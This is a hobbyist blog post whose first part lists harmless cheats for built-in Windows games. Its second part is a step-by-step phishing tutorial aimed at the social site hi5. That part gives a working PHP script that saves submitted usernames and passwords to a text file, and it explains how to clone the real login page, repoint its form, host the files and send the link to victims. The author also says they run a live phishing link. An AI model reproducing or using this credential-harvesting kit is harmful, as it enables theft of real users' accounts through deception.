Pages

FOLLOWERS

Protected by Copyscape DMCA Violation Checker
MyFreeCopyright.com Registered & Protected

VOTE FOR ME

WELCOME TO PC ORACLE!

Blog Rankings

Technology Blogs - Blog Rankings

Tuesday, April 12, 2011

WINDOWS GAMES CHEAT

WINDOWS GAME CHEATS .........................






 Solitaire: Instant Win
  1. Press Alt + Shift + 2 to instantly win
 Solitaire: Draw only 1 card (instead of 3)
  1. Hold down Ctrl + Alt + Shift then click on unopen cards to draw.
 FreeCell: Instant Win
  1. Hold down Ctrl + Shift + F10 while playing, then click Abort.
  2. Now move one card.
 FreeCell: Hidden Game Modes
  1. Go to "Game" menu choose "Select Game"
  2. Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)
 Hearts: Show All Card
    Warning! this requires a modification on your registry. Be sure you follow the steps carefully. Damage your registry might damage your Windows.
  1. Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
  2. Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
  3. Right-click on the right panel and create a new String value with the name "ZB"
  4. Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
  5. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards
 Minesweeper: Stop The Timer
  1. When you start to play a new game, the timer is ticking...
  2. Press Windows Key + D to show desktop.
  3. Now come back to the game by selecting it from the taskbar. The timer is stopped.
 Pinball
  1. Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
  2. Extra Balls: Type 1max at a new game to get extra balls.
  3. Gravity Well: Type gmax at a new game to activate Gravity Well.
  4. Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
  5. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
  6. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
  7. Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want.

PHISHING

CAUTION:YOU ARE DOING THIS HACK UNDER YOUR OWN RISK . THERE WILL NOT BE ANY GUARANTEE FOR US .  DO IT UNDER YOUR OWN RISK..!!!!!!!!!!...




.) First part:Creating the Fake Login Page.

In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.

Part 1:

First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

CODE
header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
?>


2.)Now save this as phish.php

Note:
CODE
header ('Location: http://www.hi5.com/friend/login.do ');


This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that theusername/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got "http://www.hi5.com/friend/login.do"

Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.


Part 2:

Now we go to http://www.hi5.com and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:
CODE
action=anything.


In this case we have:
CODE
action="/friend/login. do"


We replace that part with:
CODE
action="phish.php"



Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The phishing link should be something like this:

http://something.awa...e.com/login. php ---> Send this to your victim

And the txt file with the passwords like this:

http://something.awa...m/passwords.txt ---> View the passwords with this one.


Another example of phishing link:
http://hi5-friendreq...e.com/login.php

Don't log in on this one,Its my phishing link.
 But of you do that wont bother me.smiley_XD.gif

The Fake Login Page proccess is over.Easy as that.

But lot of members ask how to make the victim log in on it.Well that part when we deceive our victims to log in there is called Social Engieering. There are many ways you can do that but i will show you a very simple and efficient one in the next post.